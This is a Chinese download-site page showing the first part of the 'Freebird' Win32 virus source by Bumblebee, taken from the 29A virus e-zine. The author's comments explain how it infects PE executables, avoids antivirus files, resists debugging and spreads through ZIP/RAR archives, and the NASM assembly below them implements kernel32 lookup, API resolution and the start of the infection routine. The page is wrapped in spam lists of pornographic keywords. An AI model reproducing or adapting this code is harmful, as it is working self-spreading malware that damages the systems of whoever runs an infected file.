亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? 29a-7.006

?? 從29A上收集的病毒源碼
?? 006
?? 第 1 頁 / 共 5 頁
字號:

;
; freebird
; Coded by Bumblebee
;
; This is the source code of a VIRUS. The author is in no way
; responsabile of any damage that may occur due its usage.
;
; Some comments:
;
; That's a win32 per-process resident and direct action EPO virus.
;
; It infects only files that have any import from kernel32.dll module
; because this import is used to retrieve k32 address (and needed API).
; It requires API to go back host (restore patched bytes into host code
; section). It won't modify the EP in the PE header, instead patches the
; host code inserting a jmp to the virus. Is not the ultimate EPO but
; works and it's very easy to code, better than nothing :)
;
; It updates the PE checksum of infected PE files using imagehlp.dll
; API. If this API is not available, it still infects (checksum is zero).
;
; It does self integrity check with CRC32. That's a simple but effective
; anti-debug trick and keeps virus pretty safe of hex hacking.
;
; Uses size padding as infection sign.
;
; It won't infect most of av soft looking for the usual stringz in the
; name of the disposable victim (AV, DR, SP, F-, AN, VE, CL, ON).
;
; Has a run-time part that will affect win32 PE files with EXE ext into
; current and windows folders. It skips system protected files (SFC).
; Infecting files into windows folder helps the virus to spread with the
; simple direct action schema. If that fails (due system protected files),
; then the per-process part is there.
;
; It uses kinda mutexes to avoid overload the system with the run-time
; part. Due it uses shared memory by name as mutex, the name is random
; from serial number of c:\ drive and results from CPUID instruction ;)
;
; That name is used to uncompress a dropper and infect it. This file
; will be added to ZIP/RAR archives found in current folder. It will
; skip archives where 1st item is README.EXE (to avoid re-infection).
; It inserts the droper at the begining of the archives instead of
; appending the infected file to the end. Archive infection is a bit
; unoptimized O:) but quite clear to understand it.
;
; Per-process residence is performed as explained in an article released
; in this e-zine. I hook to check for directory changes: PostQuitMessage
; from USER32.DLL.
;
; It will get the needed API using GetProcAddress. And uses SEH to
; avoid crash, it hangs the process when a fatal error occurs (eg. if
; it cannot get the APIs to patch host code, it won't be able to go
; back host). At least won't appear an screen of death ;)
;
; Well, it's a neat virus. That was funny to code, even most parts are
; quite standard. I think that's the 2nd time i don't use crc32 for
; imports (the first one was win95.bumble, my 1st win appender), and is
; just due i was bored of the same crc32 code ever, and 2 facts:
; av stop study of viruses and... who cares with virus size? ;)
;
; I've developed it under win2k and tested under win98. That means it runs
; under windows 2000 without any problem (i cannot say the same about my
; previous 'win32' stuff). You only will notice it if thou get infected under
; such system ;)
;
; Finally i must say i'm in love with NASM, mainly due i have only this
; asm installed (fuck, and it fits in a single floppy: NASM+ALINK+DOCS+LIBS).
;
; Yes, it's Freebird from Lynard Skynard song. Oh Lord, I can't change ;)
; Try to find this song and listen it reading this lame source and, at least
; and may be not at last, you'll listen good music.
;
; That's all. The source code is pretty clear, but we're living bad times
; for the vx. May be this bug is only interesting for a small group of vxers:
; those that are experienced but still can learn something from the bee.
;
; I'm not used to greet ppl, but since i'm lost in combat... here follow
; some:
;
;       Perikles: I miss you, i'll try to met you more often (use fweeder
;                 damnit, don't be afraid of vb huehe)
;         Ratter: Seems now i'm newbie at your side... keep on rocking man
;          Xezaw: We need young blood here... Metele canya pedacho gay!
;    VirusBuster: Too much marulo arround here, uhm XD
; Mental Driller: You're the master, don't fool saying is matter of time
;          Super: Looking forward to see that .NET shit, and your ring0 tute?
;            TCP: Congratulations (he got married?)
;          Vecna: Hey favelado, te veo flojo. Para cuando el fin del mundo?
;         29Aers: You're all alone...
;
; And big cheers to other ppl i used to talk to and now i cannot due i'm
; in the shadows: Yello, Clau, f0re, Zert, Slow, soyuz, TheVoid, Sheroc,
; Tokugawa, Evul, Gigabyte, Wintermute, Malware (where are you?), Griyo,
; Roadkill, Black Jack, star0, Rajaat, ... i cannot remember you, sorry =]
;
;
; If you wanna contact with me, ask someone that can find me.
;
; - main.asm BOF -

[extern ExitProcess]

[segment .text]
[global main]
main:
        lea     esi,[fakeHost]                  ; setup fake 1st gen
        lea     edi,[epobuffTMP]
        mov     ecx,5
        rep     movsb

        lea     edx,[fake_import]
        mov     [__imp__],edx

        mov     eax,400000h
        mov     [baseAddr],eax                  ; def base addr

        lea     esi,[vBegin]
        mov     edi,vSize-4
        call    CRC32
        mov     [myCRC32],eax

        jmp     ventry

fake_import     dd      077e80000h              ; developed under win2k

;
; Since win doesn't implement code protection (via segment, thus under intel
; arch the only way to do it coz pages don't have code/data attrib), that's
; a nice way to 1st gen without external PE patcher.
;
[segment .data]

ventry:
vBegin  equ     $

        push    eax                             ; room for ret addr
        pushad
        pushfd

        call    getDelta

        lea     esi,[vBegin+ebp]
        mov     edi,vSize-4
        call    CRC32                           ; integrity check
        mov     ecx,[myCRC32+ebp]
        sub     ecx,eax
        jecxz   mycrc32ok
        jmp     $
mycrc32ok:

        lea     edi,[startUp+ebp]               ; setup return
        lea     esi,[infectTMP+ebp]             ; stuff saved in
        add     ecx,infectTMPlen                ; infection with anti-debug
        rep     movsb                           ; (ecx must be zero at this
                                                ; point)

        mov     edx,12345678h
__imp__         equ $-4
        mov     esi,[reloc+ebp]
        lea     eax,[vBegin+ebp]
        sub     esi,eax                         ; this virus supports relocs

        add     [baseAddr+ebp],esi              ; fix base addr (reloc)
        add     [hostEP+ebp],esi                ; fix host entry point

        add     edx,esi                         ; use import to find
        mov     edx,[edx]                       ; k32 base address

        xor     eax,eax
        call    seh
        jmp     $                               ; if we're not able to
                                                ; locate k32 we cannot
                                                ; get APIs and jmp back
                                                ; host is not possible
;
; Some stringz for the avers
;
        db      "[ FREEBIRD: I make birds of mud and I throw them to fly ]"
seh:
        push    dword [fs:eax]
        mov     dword [fs:eax],esp

        and     edx,0fffff000h                  ; simple k32 scan
        add     edx,1000h
findK32BaseAddrLoop:
        sub     edx,1000h
        cmp     word [edx],'MZ'
        jne     findK32BaseAddrLoop
        movzx   eax,word [edx+3ch]
        cmp     edx,dword [eax+edx+34h]
        jne     findK32BaseAddrLoop

        mov     [kerneldll+ebp],edx

        xor     eax,eax                         ; remove SEH frame
        pop     dword [fs:eax]
        pop     eax

scanKerneldll:
        mov     ebx,12345678h                   ; get GetProcAddress
kerneldll       equ $-4
        mov     edi,ebx
        mov     esi,edi
        add     esi,3ch
        lodsd
        add     eax,edi
        xchg    eax,esi
        mov     esi,dword [esi+78h]
        add     esi,ebx
        add     esi,1ch
        lodsd

        add     eax,edi
        mov     [address+ebp],eax
        lodsd
        add     eax,edi
        mov     [names+ebp],eax
        lodsd
        add     eax,edi
        mov     [ordinals+ebp],eax

        xor     edx,edx
        lea     esi,[GetProcAddress+ebp]
        mov     ecx,GetProcAddresslen
searchl:
        push    ecx
        push    esi
        mov     edi,[names+ebp]
        add     edi,edx
        mov     edi,[edi]
        add     edi,ebx
        rep     cmpsb
        je      fFound
        add     edx,4
        pop     esi
        pop     ecx
        jmp     searchl
fFound:
        pop     esi
        pop     ecx
        shr     edx,1
        add     edx,[ordinals+ebp]
        movzx   ebx,word [edx]
        shl     ebx,2
        add     ebx,[address+ebp]
        mov     ecx,[ebx]
        add     ecx,[kerneldll+ebp]

getAPI:
        mov     [_GetProcAddress+ebp],ecx

        lea     esi,[API0+ebp]                  ; now get APIs
getAPILoop:
        push    esi
        xor     eax,eax
        lodsb
        push    eax
        add     esi,4

        push    esi
        push    dword [kerneldll+ebp]
        call    dword [_GetProcAddress+ebp]

        pop     ecx
        pop     esi
        mov     [esi+1],eax
        add     esi,ecx
        jecxz   getAPILoopDone
        jmp     getAPILoop
getAPILoopDone:

        xor     eax,eax
        push    eax
        push    eax
        push    eax
        push    eax
        lea     esi,[serialNum+ebp]
        push    esi
        mov     [esi],eax                       ; fix string
        push    eax
        push    eax
        lea     esi,[drive+ebp]
        push    esi
        call    dword [_GetVolumeInformationA+ebp] ; get serial number of
        or      eax,eax                            ; c: drive
        jnz     randomOk

        mov     dword [serialNum+ebp],12345678h ; that's not random!
randomOk:

        xor     eax,eax
        inc     eax
        cpuid                                   ; mutex depends on CPU

        or      eax,edx
        xor     dword [serialNum+ebp],eax       ; fuck you avers! hueheh
                                                ; random? XD

        and     dword [serialNum+ebp],0f0f0f0fh ; build rnd string
        or      dword [serialNum+ebp],"aaaa"

        ; why that pseudo random? we don't want the avers create
        ; their artificial mutex to fool the virus, do we?

        ; check our mutex to avoid overload the system with
        ; several instances of the virus infecting arround
        ; all at the same time...
        xor     eax,eax
        lea     esi,[serialNum+ebp]
        push    esi
        push    dword 1024
        push    eax
        push    dword 4
        push    eax
        dec     eax
        push    eax
        call    dword [_CreateFileMappingA+ebp]
        or      eax,eax
        jz      near failedToLoadDll

        mov     [mutexHnd+ebp],eax

        call    dword [_GetLastError+ebp]       ; already there?
        cmp     eax,0b7h
        je      near closeMutex
        
        lea     esi,[imagehlpdll+ebp]           ; load imagehlp dll
        push    esi
        call    dword [_LoadLibraryA+ebp]
        or      eax,eax
        jz      near closeMutex

        mov     [_imagehlpdll+ebp],eax

        lea     esi,[CheckSumMappedFile+ebp]    ; get API for PE checksum
        push    esi
        push    eax
        call    dword [_GetProcAddress+ebp]

        mov     [_CheckSumMappedFile+ebp],eax

        lea     esi,[sfcdll+ebp]                ; load sfc dll
        push    esi
        call    dword [_LoadLibraryA+ebp]

        mov     [_sfcdll+ebp],eax

        or      eax,eax
        jz      near noSfc

        lea     esi,[SfcIsFileProtected+ebp]    ; get API to avoid sfc
        push    esi
        push    eax
        call    dword [_GetProcAddress+ebp]

noSfc:
        mov     [_SfcIsFileProtected+ebp],eax


        ; hey bumble, remember that must be before any infection!
        call    setupPerProcess                 ; setup per-process
                                                ; hooks

        ; now the run-time part

        lea     esi,[path0+ebp]
        push    esi
        push    dword 260
        call    dword [_GetCurrentDirectoryA+ebp]
        or      eax,eax
        jz      endRuntimePart

        push    dword 260
        lea     esi,[path1+ebp]
        push    esi
        call    dword [_GetWindowsDirectoryA+ebp]
        or      eax,eax
        jz      endRuntimePart

        mov     ecx,eax                         ; if we're yet into
        lea     esi,[path0+ebp]                 ; windows folder, avoid
        lea     edi,[path1+ebp]                 ; infect more files
        rep     cmpsb
        je      endRuntimePart

        call    scandirpe                       ; infect current folder

        lea     esi,[path1+ebp]
        push    esi
        call    dword [_SetCurrentDirectoryA+ebp]
        or      eax,eax
        jz      endRuntimePart

        call    scandirpe                       ; affect windows folder

        lea     esi,[path0+ebp]                 ; go back home
        push    esi
        call    dword [_SetCurrentDirectoryA+ebp]
        
        call    findArchives                    ; self explanatory XD

endRuntimePart:
        mov     eax,[_sfcdll+ebp]               ; free it only if loaded
        or      eax,eax                         ; (of coz hehe)
        jz      sfcNotLoaded

        push    dword [_sfcdll+ebp]
        call    dword [_FreeLibrary+ebp]

sfcNotLoaded:
        push    dword [_imagehlpdll+ebp]        ; good guys release the dlls
        call    dword [_FreeLibrary+ebp]

closeMutex:
        push    dword [mutexHnd+ebp]            ; close the 'mutex'
        call    dword [_CloseHandle+ebp]

failedToLoadDll:

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
欧美一级免费大片| 99久久精品久久久久久清纯| 亚洲欧美另类久久久精品2019| 日韩视频免费观看高清完整版在线观看 | 亚洲精品伦理在线| 亚洲欧洲99久久| 亚洲精品中文在线观看| 亚洲免费色视频| 一区二区三区中文在线观看| 亚洲综合一区二区精品导航| 亚洲天堂成人网| 亚洲人成网站精品片在线观看| 国产精品九色蝌蚪自拍| 亚洲色图视频网| 亚洲一区二区三区四区在线免费观看| 日韩理论片中文av| 亚洲成人免费在线| 青草av.久久免费一区| 久国产精品韩国三级视频| 国精产品一区一区三区mba桃花| 国内精品在线播放| www.av精品| 欧美三电影在线| 欧美第一区第二区| 国产精品你懂的在线欣赏| 亚洲欧美日韩精品久久久久| 亚洲福利电影网| 久久狠狠亚洲综合| 成人动漫一区二区三区| 欧美少妇xxx| 久久嫩草精品久久久久| **网站欧美大片在线观看| 亚洲mv在线观看| 国产在线精品一区二区三区不卡 | 国产成人精品免费看| 色综合天天狠狠| 日韩免费看网站| 亚洲天堂中文字幕| 久久99热99| 日本久久精品电影| 精品久久久久久久久久久院品网 | av高清久久久| 欧美变态tickle挠乳网站| 国产精品国产三级国产aⅴ无密码| 亚洲成av人片一区二区梦乃| 国产成人在线观看免费网站| 精品视频1区2区| 亚洲国产成人午夜在线一区| 午夜精品一区二区三区三上悠亚| 国产老肥熟一区二区三区| 欧美人妇做爰xxxⅹ性高电影| 久久久精品综合| 日韩中文字幕1| 欧美体内she精高潮| 国产精品国产三级国产有无不卡 | 国产呦精品一区二区三区网站| 在线这里只有精品| 国产精品天美传媒沈樵| 日韩黄色在线观看| 欧美性受xxxx| 综合激情网...| 福利一区二区在线观看| 欧美tickle裸体挠脚心vk| 亚洲成人午夜电影| 欧美性生活久久| 亚洲一区免费在线观看| 色综合久久综合网97色综合| 国产精品久线观看视频| 国产成人午夜电影网| 久久精品在线观看| 国产一区二区三区蝌蚪| 久久久久国产精品免费免费搜索| 麻豆视频观看网址久久| 欧美一级精品在线| 美女一区二区久久| 欧美成人欧美edvon| 极品销魂美女一区二区三区| 久久综合久色欧美综合狠狠| 精品亚洲成a人| 国产日韩欧美精品一区| 国产精品2024| 国产精品免费av| 色又黄又爽网站www久久| 亚洲综合图片区| 欧美另类变人与禽xxxxx| 午夜精品久久一牛影视| 日韩欧美资源站| 国产精品中文字幕欧美| 国产精品三级视频| 色菇凉天天综合网| 日韩激情av在线| 久久久久综合网| 成人午夜av电影| 亚洲最色的网站| 日韩精品一区二区三区视频| 精品一区二区三区视频在线观看| 精品久久久久久久人人人人传媒 | 亚洲一区二区三区四区五区黄 | 日韩一区日韩二区| 欧美视频在线不卡| 麻豆国产一区二区| 亚洲欧洲色图综合| 欧美日韩精品一区二区在线播放| 婷婷成人综合网| 国产欧美日韩综合| 日本韩国欧美三级| 日本91福利区| 国产精品青草综合久久久久99| 在线视频国内一区二区| 另类专区欧美蜜桃臀第一页| 国产精品国产三级国产有无不卡| 欧美视频中文一区二区三区在线观看| 美国十次综合导航| 亚洲精品日日夜夜| 精品国产免费久久| 欧洲一区在线观看| 福利一区二区在线| 免费一级片91| 一区二区三区在线视频播放| 久久亚洲欧美国产精品乐播| 欧美做爰猛烈大尺度电影无法无天| 蜜臀av亚洲一区中文字幕| 亚洲欧美日韩国产综合| 久久婷婷成人综合色| 欧美日韩一区二区三区免费看| 国产精品456| 日av在线不卡| 亚洲成人精品一区二区| 亚洲三级久久久| 久久久国产精品不卡| 欧美一区二区三区精品| 91国偷自产一区二区三区成为亚洲经典| 狠狠色丁香久久婷婷综| 爽好多水快深点欧美视频| 国产精品卡一卡二| 欧美激情综合网| 久久婷婷色综合| 精品福利一区二区三区免费视频| 在线看日本不卡| 一本大道久久a久久精品综合| 国产一区二区主播在线| 美女久久久精品| 麻豆精品视频在线观看| 日韩中文字幕亚洲一区二区va在线| 亚洲欧洲av另类| 亚洲天堂成人网| 国产精品国产三级国产专播品爱网| 久久久久久久久久久久久久久99| 91国偷自产一区二区开放时间 | 7777精品伊人久久久大香线蕉完整版 | 一区二区在线免费| 国产精品传媒入口麻豆| 国产午夜精品一区二区三区嫩草| 717成人午夜免费福利电影| 欧美视频在线一区二区三区| 欧美视频一区在线| 7777精品伊人久久久大香线蕉超级流畅 | 欧美久久久久久久久| 欧美亚洲尤物久久| 99精品久久久久久| 在线视频综合导航| 69堂成人精品免费视频| 91精品国产福利在线观看 | 琪琪一区二区三区| 老司机精品视频线观看86 | www.一区二区| 91福利在线看| 91精品一区二区三区久久久久久 | 久久精品亚洲一区二区三区浴池| 精品第一国产综合精品aⅴ| 久久久99精品免费观看不卡| 欧美国产精品专区| 亚洲乱码国产乱码精品精的特点 | 国产精品久久久久久久久免费桃花| 亚洲国产激情av| 亚洲小说春色综合另类电影| 日韩综合小视频| 国产精品一二一区| 一本到高清视频免费精品| 在线观看亚洲精品| 日韩欧美一区二区在线视频| 国产视频一区在线观看| 一区二区三区蜜桃| 激情文学综合丁香| 色综合久久中文综合久久97| 日韩午夜在线观看视频| 国产精品久久99| 男女性色大片免费观看一区二区 | 一区二区三区在线不卡| 麻豆精品一二三| 91国产丝袜在线播放| 欧美tickle裸体挠脚心vk| 亚洲天堂免费在线观看视频| 美国精品在线观看| 91麻豆国产自产在线观看| 精品国一区二区三区| 亚洲国产一区在线观看| 国产ts人妖一区二区| 日韩午夜激情视频| 一区二区三区在线视频观看|